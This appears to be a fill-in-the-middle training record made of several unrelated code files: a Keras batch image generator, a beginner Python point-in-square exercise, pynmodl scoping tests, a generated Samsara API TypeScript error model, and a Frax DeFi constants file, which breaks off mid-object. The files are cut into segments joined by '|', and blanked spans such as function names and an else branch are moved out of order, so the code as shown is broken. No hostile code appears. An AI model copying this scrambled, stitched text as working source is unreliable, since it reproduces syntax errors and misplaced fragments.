"""Method called at the end of every epoch.
"""
self.indexes = np.arange(len(self.image_files))
self.valid_image_files = [
j for i, j in enumerate(self.image_files) if i not in self.invalid_image_idx
]
def __len__(self) -> int:
"""Number of batches in the Sequence."""
return int(np.ceil(len(self.image_files) / self.batch_size))
def | (self, index: int) -> Tuple[np.array, np.array]:
"""Get batch at position `index`.
"""
batch_indexes = self.indexes[
index * self.batch_size : (index + 1) * self.batch_size
]
batch_samples = [self.image_files[i] for i in batch_indexes]
X = self._data_generator(batch_samples)
return X
def _data_generator(
self, image_files: List[PurePath]
) -> Tuple[np.array, np.array]:
"""Generate data from samples in specified batch."""
# initialize images and labels tensors for faster processing
X = np.empty((len(image_files), *self.target_size, 3))
invalid_image_idx = []
for i, image_file in enumerate(image_files):
# load and randomly augment image
img = load_image(
image_file=image_file, target_size=self.target_size, grayscale=False
)
if img is not None:
X[i, :] = img
else:
invalid_image_idx.append(i)
self.invalid_image_idx.append(self.counter)
self.counter += 1
if invalid_image_idx:
X = np.delete(X, invalid_image_idx, axis=0)
# apply basenet specific preprocessing
# input is 4D numpy array of RGB values within [0, 255]
X = self.basenet_preprocess(X)
return X
| __getitem__ |
lesson-oo-415.py | def isPointInSquare(x, y):
return 1.0 >= x >= -1.0 and 1.0 >= y >= -1.0
x = float(input())
y = float(input())
| print('NO') | if isPointInSquare(x, y) == True:
print('YES')
else: |
test_scoping.py | import os
from textx.metamodel import metamodel_from_file
from textx.model import children_of_type
from pynmodl.nmodl import NModlCompiler
mm = metamodel_from_file(
os.path.join(os.path.dirname(__file__), '../../grammar/nmodl.tx'))
mm.register_obj_processors({'VarRef': NModlCompiler().handle_varref})
def refs_in(node):
return children_of_type('VarRef', node)
def test_scoping():
|
def test_multiple_locals():
p = """
PARAMETER {
v (mV)
}
STATE { n }
FUNCTION alpha(x)(/ms){
LOCAL a
a = 0.1
if(fabs(x) > a){
alpha=a*x/(1-exp(-x))
}else{
alpha=a/(1-0.5*x)
}
}
DERIVATIVE dn {
LOCAL a
a = 10
n' = alpha((v + 55)/a)}
"""
blocks = mm.model_from_str(p).blocks
(parameter, state, alpha, dn) = blocks
locals_in_alpha = children_of_type('Local', alpha)
alpha_a = locals_in_alpha[0]
alpha_x = alpha.pars[0]
assert refs_in(alpha)[0].var == alpha_a # _a_ = 0.1
assert refs_in(alpha)[1].var == alpha_x # fabs(_x_) > a
assert refs_in(alpha)[2].var == alpha_a # fabs(x) > _a_
assert refs_in(alpha)[3].var == alpha # _alpha_=a*x/(1-exp(-x))
assert refs_in(alpha)[4].var == alpha_a # alpha=_a_*x/(1-exp(-x))
assert refs_in(alpha)[5].var == alpha_x # alpha=a*_x_/(1-exp(-x))
| p = """
PARAMETER {
v (mV)
}
STATE { x }
INITIAL {
LOCAL v
v = 10
x = -v : v is local
}
FUNCTION f(v) {
if(2 > 1){
LOCAL v
v = 123
f = v : v is local
}
else{
f = -v : v is funcpar
}
}
DERIVATIVE dx {
x' = f(x) + v : v is par
}
"""
blocks = mm.model_from_str(p).blocks
(parameter, state, initial, function_f, derivative) = blocks
locals_in_init = children_of_type('Local', initial)
assert refs_in(initial)[0].var == locals_in_init[0]
locals_in_function_f = children_of_type('Local', function_f)
assert refs_in(function_f)[0].var == locals_in_function_f[0]
assert refs_in(function_f)[2].var == locals_in_function_f[0]
assert type(refs_in(function_f)[-1].var).__name__ == 'FuncPar'
assert refs_in(derivative)[-1].var == parameter.parameters[0] |
JobsDeleteJobNotFoundErrorResponseBody.ts | /* tslint:disable */
/* eslint-disable */
/**
* Samsara API
* <style type=\"text/css\"> n { padding: 1em; width: 100%; display: block; margin: 28px 0; } n.info { background-color: rgba(0, 51, 160, 0.1); } n.warning { background-color: #fdf6e3; } i:before { margin-right: 6px; } nh { font-size: 1.5rem; font-weight: 700; line-height: 1.1; display: block; } nb { margin-top: 10px; padding-left: 22px; display: block; } </style> # Overview <n class=\"info\"> <nh> <i class=\"fa fa-info-circle\"></i> Something new! </nh> <nb> Welcome Samsara\'s new and improved API. Check out our FAQ [here](https://developers.samsara.com/docs/introducing-our-next-generation-api) to see what\'s changed and learn how to get started.<br> <br> Want to access the legacy API docs? You can find them [here](https://www.samsara.com/api-legacy).<br> <br> *Note: Because this is a new set of APIs, we have not transitioned all endpoints over to this standard. Endpoints that still use the legacy standards are indicated in the reference documentation. If you can\'t find an API that you\'re looking for, we encourage you to look for it in our [legacy API docs](https://www.samsara.com/api-legacy) as we continue to transition all endpoints over. Check back here for updates!*<br> <br> Submit your feedback [here](https://forms.gle/r4bs6HQshQAvBuwv6)! </nb> </n> Samsara provides API endpoints so that you can build powerful applications and custom solutions with sensor data. Samsara has endpoints available to track and analyze sensors, vehicles, and entire fleets. The Samsara API is a [RESTful API](https://en.wikipedia.org/wiki/Representational_state_transfer). It uses standard [HTTP](https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol) authentication, verbs, and response codes, and it returns [JSON](http://www.json.org/) response bodies. If you\'re familiar with what you can build with a REST API, then this will be your go-to API reference. Visit [developers.samsara.com](https://developers.samsara.com) to find getting started guides and an API overview. If you have any questions, please visit https://samsara.com/help. ## Endpoints All our APIs can be accessed through HTTP requests to URLs like: ``` https://api.samsara.com/<endpoint> ``` For EU customers, this URL will be: ``` https://api.eu.samsara.com/<endpoint> ``` <n class=\"warning\"> <nh> <i class=\"fa fa-exclamation-circle\"></i> Note </nh> <nb> Legacy endpoints will have the URL: `https://api.samsara.com/v1/<endpoint>` or `https://api.eu.samsara.com/v1/<endpoint>` </nb> </n> ## Authentication To authenticate your API request you will need to include your secret token. You can manage your API tokens in the [Dashboard](https://cloud.samsara.com). They are visible under `Settings->Organization->API Tokens`. Your API tokens carry many privileges, so be sure to keep them secure. Do not share your secret API tokens in publicly accessible areas such as GitHub, client-side code, and so on. Authentication to the API is performed via Bearer Token in the HTTP Authorization header. Provide your API token as the `access_token` value in an `Authorization: Bearer` header. You do not need to provide a password: ```curl Authorization: Bearer {access_token} ``` All API requests must be made over [HTTPS](https://en.wikipedia.org/wiki/HTTPS). Calls made over plain HTTP or without authentication will fail. ### OAuth2 If building an application for our marketplace, our API is accessible via. OAuth2 as well. | Type | Value | | ------------- |:-------------:| | Security scheme | OAuth2 | | OAuth2 Flow | accessCode | | Authorization URL | https://api.samsara.com/oauth2/authorize | | Token URL | https://api.samsara.com/oauth2/token | ## Common Patterns You can find more info about request methods, response codes, error codes, versioning, pagination, timestamps, and mini-objects [here](https://developers.samsara.com/docs/common-structures).
*
* The version of the OpenAPI document: 2021-06-09
*
*
* NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
* https://openapi-generator.tech
* Do not edit the class manually.
*/
import { exists, mapValues } from '../runtime';
/**
* Resource not found
* @export
* @interface JobsDeleteJobNotFoundErrorResponseBody
*/
export interface JobsDeleteJobNotFoundErrorResponseBody {
/**
* Message of error
* @type {string}
* @memberof JobsDeleteJobNotFoundErrorResponseBody
*/
message: string;
/**
* The request ID; used when reaching out to support for issues with requests.
* @type {string}
* @memberof JobsDeleteJobNotFoundErrorResponseBody
*/
requestId: string;
}
export function JobsDeleteJobNotFoundErrorResponseBodyFromJSON(json: any): JobsDeleteJobNotFoundErrorResponseBody {
return JobsDeleteJobNotFoundErrorResponseBodyFromJSONTyped(json, false);
}
export function JobsDeleteJobNotFoundErrorResponseBodyFromJSONTyped(json: any, ignoreDiscriminator: boolean): JobsDeleteJobNotFoundErrorResponseBody {
if ((json === undefined) || (json === null)) {
return json;
}
return {
'message': json['message'],
'requestId': json['requestId'],
};
}
export function | (value?: JobsDeleteJobNotFoundErrorResponseBody | null): any {
if (value === undefined) {
return undefined;
}
if (value === null) {
return null;
}
return {
'message': value.message,
'requestId': value.requestId,
};
}
| JobsDeleteJobNotFoundErrorResponseBodyToJSON |
constants.ts | const BigNumber = require('bignumber.js');
export const BIG6 = new BigNumber("1e6");
export const BIG12 = new BigNumber("1e12");
export const BIG18 = new BigNumber("1e18");
export const ONE_E18 = 10**18;
// For getPastLogs
export const PAST_LOGS_BATCH_SIZE = 10000;
// FXS contract created in block 11465584
export const LAST_GOOD_FXS_BURNED_SYNC_BLOCK = 12474737; // 12340690
export const LAST_GOOD_LOCKED_STAKES_SYNC_BLOCK = 12731400;
export const LAST_GOOD_LOCKED_VEFXS_SYNC_BLOCK = 12377613; // Contract created at 12377613
export function omit(key, obj) {
const { [key]: omitted, ...rest } = obj;
return rest;
}
export type GraphTimeFrame = keyof typeof GraphTimeFramePack;
export const GraphTimeFramePack = {
'All Time': 1576800000,
'1 Year': 31556952,
'6 Months': 15778476,
'3 Months': 7889238,
'1 Month': 2629746,
'1 Week': 604800,
'1 Day': 86400,
'8 Hours': 28800,
'1 Hour': 3600,
'15 Minutes': 900,
}
export const GraphTimeFramePackLowercased = {
'all-time': 1576800000,
'1-year': 31556952,
'6-months': 15778476,
'3-months': 7889238,
'1-month': 2629746,
'1-week': 604800,
'1-day': 86400,
'8-hours': 28800,
'1-hour': 3600,
'15-minutes': 900,
}
export type LockedStakeBucket = keyof typeof LockedStakeBucketPack;
export const LockedStakeBucketPack = {
'Unlocked': { idx: 0, min: 0, max: 1 },
'≤ 15 days': { idx: 1, min: 1, max: 1296000 },
'15 - 30 Days': { idx: 2, min: 1296001, max: 2592000 },
'30 - 60 Days': { idx: 3, min: 2592001, max: 5184000 },
'60 - 90 Days': { idx: 4, min: 5184001, max: 7776000 },
'90 Days - 180 Days': { idx: 5, min: 7776001, max: 15552000 },
'180 Days - 1 Year': { idx: 6, min: 15552001, max: 31536000 },
'1 Year - 2 Years': { idx: 7, min: 31536001, max: 63113904 },
'2 Years - 3 Years': { idx: 8, min: 63113905, max: 94608000 },
'3 Years - 4 Years': { idx: 9, min: 94608001, max: 900000000 }, // includes 9999 day locks
}
export type GraphTimeNumPoints = keyof typeof GraphTimeNumPointsPack;
export const GraphTimeNumPointsPack = {
'all-time': 1095, // Assuming 3 years, each day
'1-year': 365, // One point per day
'6-months': 180, // One point per day
'3-months': 180, // One point per half day
'1-month': 120, // One point per 6 hrs
'1-week': 126, // One point per 2 hrs
'1-day': 96, // One point per 15 min
'8-hours': 96, // One point per 5 min
'1-hour': 120, // One point per 30 sec
'15-minutes': 90, // One point per block (~15 seconds)
}
// Used to limit the return size of the data to it is faster
export type GraphTimeModulusPoints = keyof typeof GraphTimeNumPointsPack;
export const GraphTimeModulusPointsPack = {
'all-time': 20,
'1-year': 10,
'6-months': 10,
'3-months': 5,
'1-month': 4,
'1-week': 3,
'1-day': 2,
'8-hours': 1,
'1-hour': 1,
'15-minutes': 1,
}
export const CollateralDetailsPack = {
'yUSD': {
name: 'LP-yCurve',
dd_name: 'yCRV DAI+USDC+USDT+TUSD',
decimals: 18
},
'USDC': {
name: 'USDC',
dd_name: 'USDC',
decimals: 18
},
'USDT': {
name: 'USDT',
dd_name: 'USDT',
decimals: 18
},
};
export const COLLATERAL_TYPES = Object.keys(CollateralDetailsPack);
export const StakeChoices = {
'Snowball S3F (FRAX + TUSD + USDT)': {
logo: 'snowball',
name: 'Snowball S3F (FRAX + TUSD + USDT)',
label: 'Snowball S3F (FRAX + TUSD + USDT)',
chain: 'avalanche',
external_contract: true,
farming_link: 'https://app.snowball.network/earn_v2/'
},
'SpiritSwap FRAX/FTM': {
logo: 'spiritswap',
name: 'SpiritSwap FRAX/FTM',
label: 'SpiritSwap FRAX/FTM',
chain: 'fantom',
external_contract: true,
farming_link: 'https://app.spiritswap.finance/#/farms'
},
'SpiritSwap FRAX/FXS': {
logo: 'spiritswap',
name: 'SpiritSwap FRAX/FXS',
label: 'SpiritSwap FRAX/FXS',
chain: 'fantom',
external_contract: true,
farming_link: 'https://app.spiritswap.finance/#/farms'
},
// 'PancakeSwap FRAX/FXS': {
// logo: 'pancakeswap',
// slug: "PancakeSwap_FRAX_FXS",
// name: 'PancakeSwap FRAX/FXS',
// label: 'PancakeSwap FRAX/FXS [Deprecated]',
// oracle: 'PANCAKESWAP_FRAX_FXS',
// info_link: 'https://pancakeswap.info/pair/0x444be928a0091affe2be000f3ff904bc51b0172c',
// add_liq_link: 'https://v1exchange.pancakeswap.finance/#/add/0x29ced01c447166958605519f10dcf8b0255fb379/0xde2f075f6f14eb9d96755b24e416a53e736ca363',
// trade_link: 'https://v1exchange.pancakeswap.finance/#/swap?inputCurrency=0x29ced01c447166958605519f10dcf8b0255fb379&outputCurrency=0xde2f075f6f14eb9d96755b24e416a53e736ca363',
// precision_to_show: 6,
// staking_enabled: true,
// fxs_rewards: true,
// dual_rewards: true,
// token1_symbol: 'CAKE',
// token1_coingecko_ticker: 'pancakeswap-token',
// token1_logo: 'cake',
// chain: 'bsc',
// external_contract: false,
// version: 2
// },
'QuickSwap FRAX/QUICK': {
logo: 'quickswap',
name: 'QuickSwap FRAX/QUICK',
label: 'QuickSwap FRAX/QUICK',
chain: 'polygon',
external_contract: true,
farming_link: 'https://quickswap.exchange/#/quick'
},
'QuickSwap FRAX/FXS': {
logo: 'quickswap',
name: 'QuickSwap FRAX/FXS',
label: 'QuickSwap FRAX/FXS',
chain: 'polygon',
external_contract: true,
farming_link: 'https://quickswap.exchange/#/quick'
},
'Cream FRAX Lending': {
logo: 'cream',
name: 'Cream FRAX Lending',
label: 'Cream FRAX Lending',
chain: 'mainnet',
external_contract: true,
farming_link: 'https://app.cream.finance/'
},
'Yearn crvFRAX Vault (V2)': {
logo: 'yearn',
name: 'Yearn crvFRAX Vault (V2)',
label: 'Yearn crvFRAX Vault (V2)',
chain: 'mainnet',
external_contract: true,
farming_link: 'https://yearn.finance/vaults/0xB4AdA607B9d6b2c9Ee07A275e9616B84AC560139'
},
'Curve FRAX3CRV-f-2': {
logo: 'curve',
slug: "Curve_FRAX3CRV_F_2",
name: 'Curve FRAX3CRV-f-2',
label: 'Curve FRAX3CRV-f V2 (Metapool) [Deprecated, use Curve.fi]',
oracle: 'CURVE_FRAX_DAI_USDC_USDT',
info_link: 'https://curve.fi/frax/stats',
add_liq_link: 'https://curve.fi/frax/deposit',
trade_link: 'https://curve.fi/frax/',
external_contract: true,
farming_link: 'https://curve.fi/pools'
// precision_to_show: 6,
// staking_enabled: true,
// fxs_rewards: true,
// dual_rewards: false,
// token1_symbol: 'CRV',
// token1_coingecko_ticker: 'curve-dao-token',
// chain: 'mainnet',
// external_contract: false,
// version: 2
},
// 'FinNexus FRAX Lending': {
// logo: 'finnexus',
// name: 'FinNexus FRAX Lending',
// label: 'FinNexus FRAX Lending',
// chain: 'mainnet',
// external_contract: true,
// farming_link: 'https://options.finnexus.io'
// },
// 'SakeSwap FRAX/FXS': {
// logo: 'sakeswap',
// name: 'SakeSwap FRAX/FXS',
// label: 'SakeSwap FRAX/FXS',
// chain: 'mainnet',
// external_contract: true,
// farming_link: 'https://app.sakeswap.finance/#/farm-v2/FXS_FRAXV2_lp'
// },
'Sushi FRAX/FXS [Polygon]': {
logo: 'sushiswap',
name: 'Sushi FRAX/FXS [Polygon]',
label: 'Sushi FRAX/FXS [Polygon]',
chain: 'polygon',
external_contract: true,
farming_link: 'https://app.sushi.com/yield'
},
'Sushi FRAX/USDC [Polygon]': {
logo: 'sushiswap',
name: 'Sushi FRAX/USDC [Polygon]',
label: 'Sushi FRAX/USDC [Polygon]',
chain: 'polygon',
external_contract: true,
farming_link: 'https://app.sushi.com/yield'
},
// 'Sushi FRAX/FXS': {
// logo: 'sushiswap',
// slug: "Sushi_FRAX_FXS",
// name: 'Sushi FRAX/FXS',
// label: 'SushiSwap FRAX/FXS [Deprecated]',
// oracle: 'FRAX_FXS', // Should move to Sushi oracle later?
// info_link: 'https://analytics.sushiswap.fi/pairs/0xc218001e3d102e3d1de9bf2c0f7d9626d76c6f30',
// add_liq_link: 'https://app.sushiswap.fi/pair/0xc218001e3d102e3d1de9bf2c0f7d9626d76c6f30',
// trade_link: 'https://app.sushiswap.fi/pair/0xc218001e3d102e3d1de9bf2c0f7d9626d76c6f30',
// precision_to_show: 6,
// staking_enabled: false,
// fxs_rewards: false,
// dual_rewards: true,
// token1_symbol: 'SUSHI',
// token1_coingecko_ticker: 'sushi',
// token1_logo: 'sushi',
// chain: 'mainnet',
// external_contract: false,
// version: 1
// },
// 'Sushi FXS/WETH': {
// logo: 'sushiswap',
// slug: "Sushi_FXS_WETH",
// name: 'Sushi FXS/WETH',
// label: 'SushiSwap FXS/WETH [Deprecated]',
// oracle: 'FXS_WETH', // Should move to Sushi oracle later?
// info_link: 'https://analytics.sushiswap.fi/pairs/0x61eb53ee427ab4e007d78a9134aacb3101a2dc23',
// add_liq_link: 'https://app.sushiswap.fi/pair/0x61eb53ee427ab4e007d78a9134aacb3101a2dc23',
// trade_link: 'https://app.sushiswap.fi/pair/0x61eb53ee427ab4e007d78a9134aacb3101a2dc23',
// precision_to_show: 6,
// staking_enabled: false,
// fxs_rewards: false,
// dual_rewards: true,
// token1_symbol: 'SUSHI',
// token1_coingecko_ticker: 'sushi',
// token1_logo: 'sushi',
// chain: 'mainnet',
// external_contract: false,
// version: 1
// },
'Uniswap FRAX/USDC': {
logo: 'uniswap',
slug: "Uniswap_FRAX_USDC",
name: 'Uniswap FRAX/USDC',
label: 'Uniswap FRAX/USDC',
oracle: 'FRAX_USDC',
info_link: "https://v2.info.uniswap.org/pair/0x97c4adc5d28a86f9470c70dd91dc6cc2f20d2d4d",
add_liq_link: 'https://app.uniswap.org/#/add/v2/0x853d955acef822db058eb8505911ed77f175b99e/0xa0b86991c6218b36c1d19d4a2e9eb0ce3606eb48',
trade_link: 'https://app.uniswap.org/#/swap?use=V2&inputCurrency=0x853d955acef822db058eb8505911ed77f175b99e&outputCurrency=0xa0b86991c6218b36c1d19d4a2e9eb0ce3606eb48',
precision_to_show: 6,
staking_enabled: true,
fxs_rewards: true,
dual_rewards: false,
chain: 'mainnet',
external_contract: false,
version: 1
},
'Uniswap V3 FRAX/USDC': {
logo: 'uniswap',
slug: "Uniswap_V3_FRAX_USDC",
name: 'Uniswap V3 FRAX/USDC',
label: 'Uniswap V3 FRAX/USDC',
oracle: 'FRAX_USDC',
info_link: "https://info.uniswap.org/#/pools/0xc63b0708e2f7e69cb8a1df0e1389a98c35a76d52",
add_liq_link: 'https://app.uniswap.org/#/add/0x853d955acef822db058eb8505911ed77f175b99e/0xa0b86991c6218b36c1d19d4a2e9eb0ce3606eb48/500',
trade_link: 'https://app.uniswap.org/#/swap?inputCurrency=0x853d955acef822db058eb8505911ed77f175b99e&outputCurrency=0xa0b86991c6218b36c1d19d4a2e9eb0ce3606eb48',
precision_to_show: 6,
staking_enabled: true,
fxs_rewards: true,
dual_rewards: false,
chain: 'mainnet',
external_contract: false,
version: 1000,
pair_token0_decimals: 18,
pair_token1_decimals: 6
},
'Uniswap FRAX/WETH': {
logo: 'uniswap',
slug: "Uniswap_FRAX_WETH",
name: 'Uniswap FRAX/WETH',
label: 'Uniswap FRAX/WETH',
oracle: 'FRAX_WETH',
info_link: "https://v2.info.uniswap.org/pair/0xfd0a40bc83c5fae4203dec7e5929b446b07d1c76",
add_liq_link: 'https://app.uniswap.org/#/add/v2/0x853d955acef822db058eb8505911ed77f175b99e/ETH',
trade_link: 'https://app.uniswap.org/#/swap?use=V2&inputCurrency=0x853d955acef822db058eb8505911ed77f175b99e&outputCurrency=ETH',
precision_to_show: 6,
staking_enabled: true,
fxs_rewards: true,
dual_rewards: false,
chain: 'mainnet',
external_contract: false,
version: 1
},
'Uniswap FRAX/FXS': {
logo: 'uniswap',
slug: "Uniswap_FRAX_FXS",
name: 'Uniswap FRAX/FXS',
label: 'Uniswap FRAX/FXS',
oracle: 'FRAX_FXS',
info_link: "https://v2.info.uniswap.org/pair/0xe1573b9d29e2183b1af0e743dc2754979a40d237",
add_liq_link: 'https://app.uniswap.org/#/add/v2/0x3432b6a60d23ca0dfca7761b7ab56459d9c964d0/0x853d955acef822db058eb8505911ed77f175b99e',
trade_link: 'https://app.uniswap.org/#/swap?use=V2&inputCurrency=0x3432b6a60d23ca0dfca7761b7ab56459d9c964d0&outputCurrency=0x853d955acef822db058eb8505911ed77f175b99e',
precision_to_show: 6,
staking_enabled: true,
fxs_rewards: true,
dual_rewards: false,
chain: 'mainnet',
external_contract: false,
version: 1
},
'Uniswap FRAX/IQ': {
logo: 'uniswap',
slug: "Uniswap_FRAX_IQ",
name: 'Uniswap FRAX/IQ',
label: 'Uniswap FRAX/IQ',
oracle: 'FRAX_FXS',
info_link: "https://v2.info.uniswap.org/pair/0xd6c783b257e662ca949b441a4fcb08a53fc49914",
add_liq_link: 'https://app.uniswap.org/#/add/v2/0x853d955acef822db058eb8505911ed77f175b99e/0x579cea1889991f68acc35ff5c3dd0621ff29b0c9',
trade_link: 'https://app.uniswap.org/#/swap?use=V2&inputCurrency=0x853d955acef822db058eb8505911ed77f175b99e&outputCurrency=0x579cea1889991f68acc35ff5c3dd0621ff29b0c9',
precision_to_show: 6,
staking_enabled: true,
fxs_rewards: true,
dual_rewards: true,
vefxs_enabled: true,
token1_symbol: 'IQ',
token1_coingecko_ticker: 'everipedia',
token1_logo: 'everipedia',
chain: 'mainnet',
external_contract: false,
version: 3
},
'Uniswap FRAX/OHM': {
logo: 'uniswap',
slug: "Uniswap_FRAX_OHM",
name: 'Uniswap FRAX/OHM',
label: 'Uniswap FRAX/OHM',
oracle: 'FRAX_FXS',
info_link: "https://v2.info.uniswap.org/pair/0x2dce0dda1c2f98e0f171de8333c3c6fe1bbf4877",
add_liq_link: 'https://app.uniswap.org/#/add/v2/0x853d955acef822db058eb8505911ed77f175b99e/0x383518188c0c6d7730d91b2c03a03c837814a899',
trade_link: 'https://app.uniswap.org/#/swap?use=V2&inputCurrency=0x853d955acef822db058eb8505911ed77f175b99e&outputCurrency=0x383518188c0c6d7730d91b2c03a03c837814a899',
precision_to_show: 6,
staking_enabled: true,
fxs_rewards: true,
dual_rewards: true,
vefxs_enabled: true,
token1_symbol: 'OHM',
token1_coingecko_ticker: 'olympus',
token1_logo: 'olympus',
token1_decimals: 9,
chain: 'mainnet',
external_contract: false,
version: 4
},
// 'XDEFI XDEX-WETH-FXS-FRAX': {
// logo: 'xdefi',
// name: 'XDEFI XDEX-WETH-FXS-FRAX',
// label: 'XDEFI XDEX-WETH-FXS-FRAX',
// chain: 'mainnet',
// external_contract: true,
// farming_link: 'https://farm.xdefi.com/#/farms/46'
// },
// 'Uniswap FXS/WETH': {
// logo: 'uniswap',
// name: 'Uniswap FXS/WETH',
// label: 'Uniswap FXS/WETH [Deprecated]',
// oracle: 'FXS_WETH',
// info_link: "https://v2.info.uniswap.org/pair/0xecba967d84fcf0405f6b32bc45f4d36bfdbb2e81",
// add_liq_link: 'https://app.uniswap.org/#/add/0x3432b6a60d23ca0dfca7761b7ab56459d9c964d0/ETH',
// trade_link: 'https://app.uniswap.org/#/swap?inputCurrency=0x3432b6a60d23ca0dfca7761b7ab56459d9c964d0&outputCurrency=ETH',
// precision_to_show: 6,
// staking_enabled: false,
// fxs_rewards: true,
// dual_rewards: false,
// chain: 'mainnet',
// external_contract: false,
// version: 1
// },
// 'Curve FRAX-DAI-USDC-USDT': {
// logo: 'curve',
// name: 'Curve FRAX-DAI-USDC-USDT',
// label: 'Curve FRAX-DAI-USDC-USDT V1 [Deprecated]',
// oracle: 'CURVE_FRAX_DAI_USDC_USDT',
// info_link: 'https://crv.finance/',
// add_liq_link: 'https://crv.to/pool',
// trade_link: 'https://crv.to/swap',
// precision_to_show: 6,
// staking_enabled: true,
// fxs_rewards: true,
// dual_rewards: false,
// token1_symbol: 'CRV',
// token1_coingecko_ticker: 'curve-dao-token',
// chain: 'mainnet',
// external_contract: false,
// version: 1
// },
};
export const GovernanceHistoryCodes = {
"Created": 0,
"Active": 1,
"Rejected": 2,
"Succeeded": 3,
"Queued": 4,
"Executed": 5
}
export const govHistStringFromCode = (code: number) => {
const theKeys = Object.keys(GovernanceHistoryCodes);
for (let i = 0; i < theKeys.length; i++){
const key = theKeys[i];
if (GovernanceHistoryCodes[key] == code) return key;
}
return null;
}
export const INVESTOR_ALLOCATIONS = {
'Investor_V1': [
{ title: "Unallocated", big_base: BIG6, symbol: 'USDC' },
{ title: "yearn", big_base: BIG6, symbol: 'USDC' },
{ title: "AAVE", big_base: BIG6, symbol: 'USDC' },
{ title: "Compound", big_base: BIG6, symbol: 'USDC' },
{ title: "Total", big_base: BIG6, symbol: 'USDC' }
],
'Investor_V2': [
{ title: "Unallocated", big_base: BIG6, symbol: 'USDC' },
{ title: "yearn", big_base: BIG6, symbol: 'USDC' },
{ title: "AAVE", big_base: BIG6, symbol: 'USDC' },
{ title: "Compound", big_base: BIG6, symbol: 'USDC' },
{ title: "Total", big_base: BIG6, symbol: 'USDC' }
],
'LendingAMO_V1': [
{ title: "Unallocated FRAX", big_base: BIG18, symbol: 'FRAX' },
{ title: "crFRAX", big_base: BIG18, symbol: 'FRAX' },
{ title: "Staked FPT-FRAX", big_base: BIG18, symbol: 'FRAX' },
{ title: "Free FPT-FRAX", big_base: BIG18, symbol: 'FRAX' },
{ title: "Unwinding CFNX", big_base: BIG18, symbol: 'CFNX' },
{ title: "Claimable Unwound FNX", big_base: BIG18, symbol: 'FNX' },
{ title: "Free FNX", big_base: BIG18, symbol: 'FNX' },
{ title: "FNX Total", big_base: BIG18, symbol: 'FNX' },
{ title: "FRAX Total", big_base: BIG18, symbol: 'FRAX' },
{ title: "CollatDollarBalance", big_base: BIG18, symbol: 'USD' },
],
'CurveAMO_V1': [
{ title: "Unallocated FRAX", big_base: BIG18, symbol: 'FRAX' },
{ title: "FRAX withdrawable from LP", big_base: BIG18, symbol: 'FRAX' },
{ title: "Total FRAX", big_base: BIG18, symbol: 'FRAX' },
{ title: "Free Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "Collateral withdrawable from LP", big_base: BIG6, symbol: 'USDC' },
{ title: "Subtotal Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "Total Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "FRAX3CRV-2-f Free and Owned", big_base: BIG18, symbol: 'FRAX3CRV' },
{ title: "FRAX3CRV-2-f Total Supply", big_base: BIG18, symbol: 'FRAX3CRV' },
{ title: "3CRV Withdrawable", big_base: BIG18, symbol: '3CRV' },
],
'CurveAMO_V2': [
{ title: "Unallocated FRAX", big_base: BIG18, symbol: 'FRAX' },
{ title: "FRAX withdrawable from LP", big_base: BIG18, symbol: 'FRAX' },
{ title: "Total FRAX", big_base: BIG18, symbol: 'FRAX' },
{ title: "Free Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "Collateral withdrawable from LP", big_base: BIG6, symbol: 'USDC' },
{ title: "Subtotal Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "Total Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "FRAX3CRV-2-f Free and Owned", big_base: BIG18, symbol: 'FRAX3CRV' },
{ title: "FRAX3CRV-2-f Total Supply", big_base: BIG18, symbol: 'FRAX3CRV' },
{ title: "3CRV Withdrawable", big_base: BIG18, symbol: '3CRV' },
{ title: "FRAX3CRV-2-f in Gauge", big_base: BIG18, symbol: 'FRAX3CRV' },
{ title: "FRAX3CRV-2-f lent to Voter", big_base: BIG18, symbol: 'FRAX3CRV' },
],
'CurveAMO_V3': [
{ title: "Unallocated FRAX", big_base: BIG18, symbol: 'FRAX' },
{ title: "FRAX withdrawable from LP", big_base: BIG18, symbol: 'FRAX' },
{ title: "Total FRAX", big_base: BIG18, symbol: 'FRAX' },
{ title: "Free Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "Collateral withdrawable from LP", big_base: BIG6, symbol: 'USDC' },
{ title: "Subtotal Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "Total Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "FRAX3CRV-2-f Free and Owned", big_base: BIG18, symbol: 'FRAX3CRV' },
{ title: "FRAX3CRV-2-f Total Supply", big_base: BIG18, symbol: 'FRAX3CRV' },
{ title: "3CRV Withdrawable", big_base: BIG18, symbol: '3CRV' },
{ title: "FRAX3CRV in Vault", big_base: BIG18, symbol: 'USD' },
],
'CurveAMO_V4': [
{ title: "Unallocated FRAX", big_base: BIG18, symbol: 'FRAX' },
{ title: "FRAX withdrawable from LP", big_base: BIG18, symbol: 'FRAX' },
{ title: "Total FRAX", big_base: BIG18, symbol: 'FRAX' },
{ title: "Free Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "Collateral withdrawable from LP", big_base: BIG6, symbol: 'USDC' },
{ title: "Subtotal Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "Total Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "FRAX3CRV-2-f Free and Owned", big_base: BIG18, symbol: 'FRAX3CRV' },
{ title: "FRAX3CRV-2-f Total Supply", big_base: BIG18, symbol: 'FRAX3CRV' },
{ title: "3CRV Withdrawable", big_base: BIG18, symbol: '3CRV' },
{ title: "FRAX3CRV in Vault", big_base: BIG18, symbol: 'USD' },
],
'StakeDAO_AMO': [
{ title: "Unallocated FRAX", big_base: BIG18, symbol: 'FRAX' },
{ title: "FRAX withdrawable from LP", big_base: BIG18, symbol: 'FRAX' },
{ title: "Total FRAX", big_base: BIG18, symbol: 'FRAX' },
{ title: "Free Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "Collateral withdrawable from LP", big_base: BIG6, symbol: 'USDC' },
{ title: "Subtotal Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "Total Collateral", big_base: BIG6, symbol: 'USDC' },
{ title: "FRAX3CRV-2-f Free and Owned", big_base: BIG18, symbol: 'FRAX3CRV' },
{ title: "FRAX3CRV-2-f Total Supply", big_base: BIG18, symbol: 'FRAX3CRV' },
